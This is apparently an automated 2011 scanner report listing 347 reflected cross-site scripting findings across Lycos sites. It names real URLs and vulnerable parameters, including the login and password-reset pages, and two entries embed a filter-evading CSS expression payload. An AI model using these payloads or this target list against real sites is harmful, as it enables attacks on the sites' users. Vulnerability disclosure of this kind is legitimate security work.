lycos.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in Lycos HTTP Systems | CloudScan Vulnerability Crawler Report

Report generated by XSS.CX at Mon Feb 07 15:58:41 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://classifieds.lycos.ca/ [name of an arbitrarily supplied request parameter]

1.2. http://classifieds.lycos.co.nz/ [name of an arbitrarily supplied request parameter]

1.3. http://classifieds.lycos.co.uk/ [name of an arbitrarily supplied request parameter]

1.4. http://classifieds.lycos.com/ [mobile parameter]

1.5. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

1.6. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 1]

1.7. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 2]

1.8. http://classifieds.lycos.com/ajax/submission.php [name of an arbitrarily supplied request parameter]

1.9. http://classifieds.lycos.com/bootstrap.js [REST URL parameter 1]

1.10. http://classifieds.lycos.com/browse/ [REST URL parameter 1]

1.11. http://classifieds.lycos.com/browse/ [name of an arbitrarily supplied request parameter]

1.12. http://classifieds.lycos.com/community-rideshare/ [REST URL parameter 1]

1.13. http://classifieds.lycos.com/community-rideshare/ [name of an arbitrarily supplied request parameter]

1.14. http://classifieds.lycos.com/community/ [REST URL parameter 1]

1.15. http://classifieds.lycos.com/community/ [name of an arbitrarily supplied request parameter]

1.16. http://classifieds.lycos.com/housing-rent-apartment/ [REST URL parameter 1]

1.17. http://classifieds.lycos.com/housing-rent-apartment/ [name of an arbitrarily supplied request parameter]

1.18. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 1]

1.19. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 2]

1.20. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [name of an arbitrarily supplied request parameter]

1.21. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 1]

1.22. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 2]

1.23. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [name of an arbitrarily supplied request parameter]

1.24. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 1]

1.25. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 2]

1.26. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [name of an arbitrarily supplied request parameter]

1.27. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 1]

1.28. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 2]

1.29. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [name of an arbitrarily supplied request parameter]

1.30. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [REST URL parameter 1]

1.31. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [name of an arbitrarily supplied request parameter]

1.32. http://classifieds.lycos.com/housing-rent-condo/ [REST URL parameter 1]

1.33. http://classifieds.lycos.com/housing-rent-condo/ [name of an arbitrarily supplied request parameter]

1.34. http://classifieds.lycos.com/housing-rent-home/ [REST URL parameter 1]

1.35. http://classifieds.lycos.com/housing-rent-home/ [name of an arbitrarily supplied request parameter]

1.36. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 1]

1.37. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 2]

1.38. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [name of an arbitrarily supplied request parameter]

1.39. http://classifieds.lycos.com/housing-rent-roommates/ [REST URL parameter 1]

1.40. http://classifieds.lycos.com/housing-rent-roommates/ [name of an arbitrarily supplied request parameter]

1.41. http://classifieds.lycos.com/housing-rent-short_term/ [REST URL parameter 1]

1.42. http://classifieds.lycos.com/housing-rent-short_term/ [name of an arbitrarily supplied request parameter]

1.43. http://classifieds.lycos.com/housing-rent-storage/ [REST URL parameter 1]

1.44. http://classifieds.lycos.com/housing-rent-storage/ [name of an arbitrarily supplied request parameter]

1.45. http://classifieds.lycos.com/housing-rent-vacation/ [REST URL parameter 1]

1.46. http://classifieds.lycos.com/housing-rent-vacation/ [name of an arbitrarily supplied request parameter]

1.47. http://classifieds.lycos.com/housing-rent/ [REST URL parameter 1]

1.48. http://classifieds.lycos.com/housing-rent/ [name of an arbitrarily supplied request parameter]

1.49. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [REST URL parameter 1]

1.50. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [name of an arbitrarily supplied request parameter]

1.51. http://classifieds.lycos.com/housing-sale-commercial-retail/ [REST URL parameter 1]

1.52. http://classifieds.lycos.com/housing-sale-commercial-retail/ [name of an arbitrarily supplied request parameter]

1.53. http://classifieds.lycos.com/housing-sale-condo/ [REST URL parameter 1]

1.54. http://classifieds.lycos.com/housing-sale-condo/ [name of an arbitrarily supplied request parameter]

1.55. http://classifieds.lycos.com/housing-sale-foreclosure/ [REST URL parameter 1]

1.56. http://classifieds.lycos.com/housing-sale-foreclosure/ [name of an arbitrarily supplied request parameter]

1.57. http://classifieds.lycos.com/housing-sale-home/ [REST URL parameter 1]

1.58. http://classifieds.lycos.com/housing-sale-home/ [name of an arbitrarily supplied request parameter]

1.59. http://classifieds.lycos.com/housing-sale-land/ [REST URL parameter 1]

1.60. http://classifieds.lycos.com/housing-sale-land/ [name of an arbitrarily supplied request parameter]

1.61. http://classifieds.lycos.com/housing-sale-multi_family/ [REST URL parameter 1]

1.62. http://classifieds.lycos.com/housing-sale-multi_family/ [name of an arbitrarily supplied request parameter]

1.63. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

1.64. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

1.65. http://classifieds.lycos.com/housing-sale-vacation/ [name of an arbitrarily supplied request parameter]

1.66. http://classifieds.lycos.com/housing-sale/ [REST URL parameter 1]

1.67. http://classifieds.lycos.com/housing-sale/ [name of an arbitrarily supplied request parameter]

1.68. http://classifieds.lycos.com/job-admin/ [REST URL parameter 1]

1.69. http://classifieds.lycos.com/job-admin/ [name of an arbitrarily supplied request parameter]

1.70. http://classifieds.lycos.com/job-advertising/ [REST URL parameter 1]

1.71. http://classifieds.lycos.com/job-advertising/ [name of an arbitrarily supplied request parameter]

1.72. http://classifieds.lycos.com/job-customer_service/ [REST URL parameter 1]

1.73. http://classifieds.lycos.com/job-customer_service/ [name of an arbitrarily supplied request parameter]

1.74. http://classifieds.lycos.com/job-finance/ [REST URL parameter 1]

1.75. http://classifieds.lycos.com/job-finance/ [name of an arbitrarily supplied request parameter]

1.76. http://classifieds.lycos.com/job-nonprofit/ [REST URL parameter 1]

1.77. http://classifieds.lycos.com/job-nonprofit/ [name of an arbitrarily supplied request parameter]

1.78. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

1.79. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

1.80. http://classifieds.lycos.com/job-retail/ [name of an arbitrarily supplied request parameter]

1.81. http://classifieds.lycos.com/job-sales/ [REST URL parameter 1]

1.82. http://classifieds.lycos.com/job-sales/ [name of an arbitrarily supplied request parameter]

1.83. http://classifieds.lycos.com/job-tech/ [REST URL parameter 1]

1.84. http://classifieds.lycos.com/job-tech/ [name of an arbitrarily supplied request parameter]

1.85. http://classifieds.lycos.com/job-work_from_home/ [REST URL parameter 1]

1.86. http://classifieds.lycos.com/job-work_from_home/ [name of an arbitrarily supplied request parameter]

1.87. http://classifieds.lycos.com/job/ [REST URL parameter 1]

1.88. http://classifieds.lycos.com/job/ [name of an arbitrarily supplied request parameter]

1.89. http://classifieds.lycos.com/personals/ [REST URL parameter 1]

1.90. http://classifieds.lycos.com/personals/ [name of an arbitrarily supplied request parameter]

1.91. http://classifieds.lycos.com/post/ [REST URL parameter 1]

1.92. http://classifieds.lycos.com/post/ [name of an arbitrarily supplied request parameter]

1.93. http://classifieds.lycos.com/sale-clothes/ [REST URL parameter 1]

1.94. http://classifieds.lycos.com/sale-clothes/ [name of an arbitrarily supplied request parameter]

1.95. http://classifieds.lycos.com/sale-collectible/ [REST URL parameter 1]

1.96. http://classifieds.lycos.com/sale-collectible/ [name of an arbitrarily supplied request parameter]

1.97. http://classifieds.lycos.com/sale-electronics/ [REST URL parameter 1]

1.98. http://classifieds.lycos.com/sale-electronics/ [name of an arbitrarily supplied request parameter]

1.99. http://classifieds.lycos.com/sale-entertainment/ [REST URL parameter 1]

1.100. http://classifieds.lycos.com/sale-entertainment/ [name of an arbitrarily supplied request parameter]

1.101. http://classifieds.lycos.com/sale-free/ [REST URL parameter 1]

1.102. http://classifieds.lycos.com/sale-free/ [name of an arbitrarily supplied request parameter]

1.103. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 1]

1.104. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 2]

1.105. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [name of an arbitrarily supplied request parameter]

1.106. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 1]

1.107. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 2]

1.108. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [name of an arbitrarily supplied request parameter]

1.109. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 1]

1.110. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 2]

1.111. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [name of an arbitrarily supplied request parameter]

1.112. http://classifieds.lycos.com/sale-furniture/ [REST URL parameter 1]

1.113. http://classifieds.lycos.com/sale-furniture/ [name of an arbitrarily supplied request parameter]

1.114. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 1]

1.115. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 2]

1.116. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [name of an arbitrarily supplied request parameter]

1.117. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 1]

1.118. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 2]

1.119. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [name of an arbitrarily supplied request parameter]

1.120. http://classifieds.lycos.com/sale-home-appliance/ [REST URL parameter 1]

1.121. http://classifieds.lycos.com/sale-home-appliance/ [name of an arbitrarily supplied request parameter]

1.122. http://classifieds.lycos.com/sale-kid/ [REST URL parameter 1]

1.123. http://classifieds.lycos.com/sale-kid/ [name of an arbitrarily supplied request parameter]

1.124. http://classifieds.lycos.com/sale-music/ [REST URL parameter 1]

1.125. http://classifieds.lycos.com/sale-music/ [name of an arbitrarily supplied request parameter]

1.126. http://classifieds.lycos.com/sale-pet-bird/ [REST URL parameter 1]

1.127. http://classifieds.lycos.com/sale-pet-bird/ [name of an arbitrarily supplied request parameter]

1.128. http://classifieds.lycos.com/sale-pet-cat/ [REST URL parameter 1]

1.129. http://classifieds.lycos.com/sale-pet-cat/ [name of an arbitrarily supplied request parameter]

1.130. http://classifieds.lycos.com/sale-pet-dog/ [REST URL parameter 1]

1.131. http://classifieds.lycos.com/sale-pet-dog/ [name of an arbitrarily supplied request parameter]

1.132. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 1]

1.133. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 2]

1.134. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [name of an arbitrarily supplied request parameter]

1.135. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 1]

1.136. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 2]

1.137. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [name of an arbitrarily supplied request parameter]

1.138. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 1]

1.139. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 2]

1.140. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [name of an arbitrarily supplied request parameter]

1.141. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 1]

1.142. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 2]

1.143. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [name of an arbitrarily supplied request parameter]

1.144. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 1]

1.145. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 2]

1.146. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [name of an arbitrarily supplied request parameter]

1.147. http://classifieds.lycos.com/sale-pet-fish/ [REST URL parameter 1]

1.148. http://classifieds.lycos.com/sale-pet-fish/ [name of an arbitrarily supplied request parameter]

1.149. http://classifieds.lycos.com/sale-pet-supply/ [REST URL parameter 1]

1.150. http://classifieds.lycos.com/sale-pet-supply/ [name of an arbitrarily supplied request parameter]

1.151. http://classifieds.lycos.com/sale-pet/ [REST URL parameter 1]

1.152. http://classifieds.lycos.com/sale-pet/ [name of an arbitrarily supplied request parameter]

1.153. http://classifieds.lycos.com/sale-sale-garage/ [REST URL parameter 1]

1.154. http://classifieds.lycos.com/sale-sale-garage/ [name of an arbitrarily supplied request parameter]

1.155. http://classifieds.lycos.com/sale-tickets-concert/ [REST URL parameter 1]

1.156. http://classifieds.lycos.com/sale-tickets-concert/ [name of an arbitrarily supplied request parameter]

1.157. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [REST URL parameter 1]

1.158. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [name of an arbitrarily supplied request parameter]

1.159. http://classifieds.lycos.com/sale-tickets-group-festival/ [REST URL parameter 1]

1.160. http://classifieds.lycos.com/sale-tickets-group-festival/ [name of an arbitrarily supplied request parameter]

1.161. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [REST URL parameter 1]

1.162. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [name of an arbitrarily supplied request parameter]

1.163. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [REST URL parameter 1]

1.164. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [name of an arbitrarily supplied request parameter]

1.165. http://classifieds.lycos.com/sale-tickets-sports/ [REST URL parameter 1]

1.166. http://classifieds.lycos.com/sale-tickets-sports/ [name of an arbitrarily supplied request parameter]

1.167. http://classifieds.lycos.com/sale-tickets-theater/ [REST URL parameter 1]

1.168. http://classifieds.lycos.com/sale-tickets-theater/ [name of an arbitrarily supplied request parameter]

1.169. http://classifieds.lycos.com/sale-tickets/ [REST URL parameter 1]

1.170. http://classifieds.lycos.com/sale-tickets/ [name of an arbitrarily supplied request parameter]

1.171. http://classifieds.lycos.com/sale-toy/ [REST URL parameter 1]

1.172. http://classifieds.lycos.com/sale-toy/ [name of an arbitrarily supplied request parameter]

1.173. http://classifieds.lycos.com/sale/ [REST URL parameter 1]

1.174. http://classifieds.lycos.com/sale/ [name of an arbitrarily supplied request parameter]

1.175. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

1.176. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

1.177. http://classifieds.lycos.com/service-car/ [name of an arbitrarily supplied request parameter]

1.178. http://classifieds.lycos.com/service-care/ [REST URL parameter 1]

1.179. http://classifieds.lycos.com/service-care/ [name of an arbitrarily supplied request parameter]

1.180. http://classifieds.lycos.com/service-cleaning/ [REST URL parameter 1]

1.181. http://classifieds.lycos.com/service-cleaning/ [name of an arbitrarily supplied request parameter]

1.182. http://classifieds.lycos.com/service-coupon/ [REST URL parameter 1]

1.183. http://classifieds.lycos.com/service-coupon/ [name of an arbitrarily supplied request parameter]

1.184. http://classifieds.lycos.com/service-creative-design/ [REST URL parameter 1]

1.185. http://classifieds.lycos.com/service-creative-design/ [name of an arbitrarily supplied request parameter]

1.186. http://classifieds.lycos.com/service-education-tutor/ [REST URL parameter 1]

1.187. http://classifieds.lycos.com/service-education-tutor/ [name of an arbitrarily supplied request parameter]

1.188. http://classifieds.lycos.com/service-entertainment-catering/ [REST URL parameter 1]

1.189. http://classifieds.lycos.com/service-entertainment-catering/ [name of an arbitrarily supplied request parameter]

1.190. http://classifieds.lycos.com/service-health/ [REST URL parameter 1]

1.191. http://classifieds.lycos.com/service-health/ [name of an arbitrarily supplied request parameter]

1.192. http://classifieds.lycos.com/service-home-appliance/ [REST URL parameter 1]

1.193. http://classifieds.lycos.com/service-home-appliance/ [name of an arbitrarily supplied request parameter]

1.194. http://classifieds.lycos.com/service-home-plumbing/ [REST URL parameter 1]

1.195. http://classifieds.lycos.com/service-home-plumbing/ [name of an arbitrarily supplied request parameter]

1.196. http://classifieds.lycos.com/service-lawn/ [REST URL parameter 1]

1.197. http://classifieds.lycos.com/service-lawn/ [name of an arbitrarily supplied request parameter]

1.198. http://classifieds.lycos.com/service-move/ [REST URL parameter 1]

1.199. http://classifieds.lycos.com/service-move/ [name of an arbitrarily supplied request parameter]

1.200. http://classifieds.lycos.com/service-pet-grooming/ [REST URL parameter 1]

1.201. http://classifieds.lycos.com/service-pet-grooming/ [name of an arbitrarily supplied request parameter]

1.202. http://classifieds.lycos.com/service-pet-sitter/ [REST URL parameter 1]

1.203. http://classifieds.lycos.com/service-pet-sitter/ [name of an arbitrarily supplied request parameter]

1.204. http://classifieds.lycos.com/service-pet-veterinarian/ [REST URL parameter 1]

1.205. http://classifieds.lycos.com/service-pet-veterinarian/ [name of an arbitrarily supplied request parameter]

1.206. http://classifieds.lycos.com/service-tech/ [REST URL parameter 1]

1.207. http://classifieds.lycos.com/service-tech/ [name of an arbitrarily supplied request parameter]

1.208. http://classifieds.lycos.com/service/ [REST URL parameter 1]

1.209. http://classifieds.lycos.com/service/ [name of an arbitrarily supplied request parameter]

1.210. http://classifieds.lycos.com/sitemap/ [REST URL parameter 1]

1.211. http://classifieds.lycos.com/sitemap/ [name of an arbitrarily supplied request parameter]

1.212. http://classifieds.lycos.com/vehicle-boat/ [REST URL parameter 1]

1.213. http://classifieds.lycos.com/vehicle-boat/ [name of an arbitrarily supplied request parameter]

1.214. http://classifieds.lycos.com/vehicle-car-convertible/ [REST URL parameter 1]

1.215. http://classifieds.lycos.com/vehicle-car-convertible/ [name of an arbitrarily supplied request parameter]

1.216. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 1]

1.217. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 2]

1.218. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [name of an arbitrarily supplied request parameter]

1.219. http://classifieds.lycos.com/vehicle-car-mini_van/ [REST URL parameter 1]

1.220. http://classifieds.lycos.com/vehicle-car-mini_van/ [name of an arbitrarily supplied request parameter]

1.221. http://classifieds.lycos.com/vehicle-car-sedan/ [REST URL parameter 1]

1.222. http://classifieds.lycos.com/vehicle-car-sedan/ [name of an arbitrarily supplied request parameter]

1.223. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 1]

1.224. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 2]

1.225. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [name of an arbitrarily supplied request parameter]

1.226. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 1]

1.227. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 2]

1.228. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [name of an arbitrarily supplied request parameter]

1.229. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 1]

1.230. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 2]

1.231. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [name of an arbitrarily supplied request parameter]

1.232. http://classifieds.lycos.com/vehicle-car-suv/ [REST URL parameter 1]

1.233. http://classifieds.lycos.com/vehicle-car-suv/ [name of an arbitrarily supplied request parameter]

1.234. http://classifieds.lycos.com/vehicle-car-truck/ [REST URL parameter 1]

1.235. http://classifieds.lycos.com/vehicle-car-truck/ [name of an arbitrarily supplied request parameter]

1.236. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 1]

1.237. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 2]

1.238. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [name of an arbitrarily supplied request parameter]

1.239. http://classifieds.lycos.com/vehicle-motorcycle/ [REST URL parameter 1]

1.240. http://classifieds.lycos.com/vehicle-motorcycle/ [name of an arbitrarily supplied request parameter]

1.241. http://classifieds.lycos.com/vehicle-parts/ [REST URL parameter 1]

1.242. http://classifieds.lycos.com/vehicle-parts/ [name of an arbitrarily supplied request parameter]

1.243. http://classifieds.lycos.com/vehicle/ [REST URL parameter 1]

1.244. http://classifieds.lycos.com/vehicle/ [name of an arbitrarily supplied request parameter]

1.245. http://classifieds.lycos.com.au/ [name of an arbitrarily supplied request parameter]

1.246. http://classifieds.lycos.in/ [name of an arbitrarily supplied request parameter]

1.247. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

1.248. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

1.249. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

1.250. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

1.251. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

1.252. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

1.253. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

1.254. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

1.255. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

1.256. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

1.257. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

1.258. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

1.259. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

1.260. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

1.261. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

1.262. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

1.263. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

1.264. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

1.265. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

1.266. http://deals.lycos.com/deals/stores/mwave-521 [name of an arbitrarily supplied request parameter]

1.267. http://deals.lycos.com/deals/stores/tigerdirect-597 [name of an arbitrarily supplied request parameter]

1.268. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

1.269. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

1.270. http://jobs.lycos.com/search [l parameter]

1.271. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

1.272. http://jobs.lycos.com/search [q parameter]

1.273. http://jobs.lycos.com/search [x parameter]

1.274. http://jobs.lycos.com/search [x parameter]

1.275. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

1.276. http://peoplesearch.lycos.com/ [search-type parameter]

1.277. http://peoplesearch.lycos.com/ [tab parameter]

1.278. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

1.279. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

1.280. https://registration.lycos.com/login.php [name of an arbitrarily supplied request parameter]

1.281. https://registration.lycos.com/lostpassword.php [name of an arbitrarily supplied request parameter]

1.282. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

1.283. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

1.284. http://search.lycos.com/ [cat parameter]

1.285. http://search.lycos.com/ [cat parameter]

1.286. http://search.lycos.com/ [mobile parameter]

1.287. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

1.288. http://search.lycos.com/ [query parameter]

1.289. http://search.lycos.com/ [src parameter]

1.290. http://search.lycos.com/ [tab parameter]

1.291. http://search.lycos.com/image/ [cat parameter]

1.292. http://search.lycos.com/image/ [cat parameter]

1.293. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

1.294. http://search.lycos.com/image/ [tab parameter]

1.295. http://search.lycos.com/video/ [cat parameter]

1.296. http://search.lycos.com/video/ [cat parameter]

1.297. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

1.298. http://search.lycos.com/video/ [tab parameter]

1.299. http://www.lycos.at/ [name of an arbitrarily supplied request parameter]

1.300. http://www.lycos.at/ [utm_campaign parameter]

1.301. http://www.lycos.at/ [utm_medium parameter]

1.302. http://www.lycos.at/ [utm_source parameter]

1.303. http://www.lycos.be/ [name of an arbitrarily supplied request parameter]

1.304. http://www.lycos.be/ [utm_campaign parameter]

1.305. http://www.lycos.be/ [utm_medium parameter]

1.306. http://www.lycos.be/ [utm_source parameter]

1.307. http://www.lycos.ca/ [name of an arbitrarily supplied request parameter]

1.308. http://www.lycos.ca/ [utm_campaign parameter]

1.309. http://www.lycos.ca/ [utm_medium parameter]

1.310. http://www.lycos.ca/ [utm_source parameter]

1.311. http://www.lycos.ch/ [name of an arbitrarily supplied request parameter]

1.312. http://www.lycos.ch/ [utm_campaign parameter]

1.313. http://www.lycos.ch/ [utm_medium parameter]

1.314. http://www.lycos.ch/ [utm_source parameter]

1.315. http://www.lycos.cl/ [name of an arbitrarily supplied request parameter]

1.316. http://www.lycos.cl/ [utm_campaign parameter]

1.317. http://www.lycos.cl/ [utm_medium parameter]

1.318. http://www.lycos.cl/ [utm_source parameter]

1.319. http://www.lycos.co.jp/ [name of an arbitrarily supplied request parameter]

1.320. http://www.lycos.co.jp/ [utm_campaign parameter]

1.321. http://www.lycos.co.jp/ [utm_medium parameter]

1.322. http://www.lycos.co.jp/ [utm_source parameter]

1.323. http://www.lycos.co.kr/ [name of an arbitrarily supplied request parameter]

1.324. http://www.lycos.co.kr/ [utm_campaign parameter]

1.325. http://www.lycos.co.kr/ [utm_medium parameter]

1.326. http://www.lycos.co.kr/ [utm_source parameter]

1.327. http://www.lycos.co.nz/ [name of an arbitrarily supplied request parameter]

1.328. http://www.lycos.co.nz/ [utm_campaign parameter]

1.329. http://www.lycos.co.nz/ [utm_medium parameter]

1.330. http://www.lycos.co.nz/ [utm_source parameter]

1.331. http://www.lycos.co.uk/ [name of an arbitrarily supplied request parameter]

1.332. http://www.lycos.co.uk/ [utm_campaign parameter]

1.333. http://www.lycos.co.uk/ [utm_medium parameter]

1.334. http://www.lycos.co.uk/ [utm_source parameter]

1.335. http://www.lycos.com.ar/ [name of an arbitrarily supplied request parameter]

1.336. http://www.lycos.com.ar/ [utm_campaign parameter]

1.337. http://www.lycos.com.ar/ [utm_medium parameter]

1.338. http://www.lycos.com.ar/ [utm_source parameter]

1.339. http://www.lycos.com.au/ [name of an arbitrarily supplied request parameter]

1.340. http://www.lycos.com.au/ [utm_campaign parameter]

1.341. http://www.lycos.com.au/ [utm_medium parameter]

1.342. http://www.lycos.com.au/ [utm_source parameter]

1.343. http://www.lycos.com.br/ [name of an arbitrarily supplied request parameter]

1.344. http://www.lycos.com.br/ [utm_campaign parameter]

1.345. http://www.lycos.com.br/ [utm_medium parameter]

1.346. http://www.lycos.com.br/ [utm_source parameter]

1.347. http://www.lycos.com.co/ [name of an arbitrarily supplied request parameter]

